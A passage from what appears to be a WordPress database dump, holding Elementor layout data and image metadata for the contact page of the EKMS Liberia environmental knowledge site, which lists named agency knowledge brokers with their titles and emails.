href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24424,3601,'_wp_attached_file','2021/03/konikay.png'),(24425,3601,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:19:\"2021/03/konikay.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"konikay-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"konikay-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24426,3602,'_wp_attached_file','2021/03/duolupeh.png'),(24427,3602,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:20:\"2021/03/duolupeh.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"duolupeh-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"duolupeh-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24428,3603,'_elementor_edit_mode','builder'),(24429,3603,'_elementor_template_type','wp-page'),(24430,3603,'_elementor_version','3.0.16'),(24431,3603,'_wp_page_template','default'),(24432,3603,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7f527f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9540449\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a 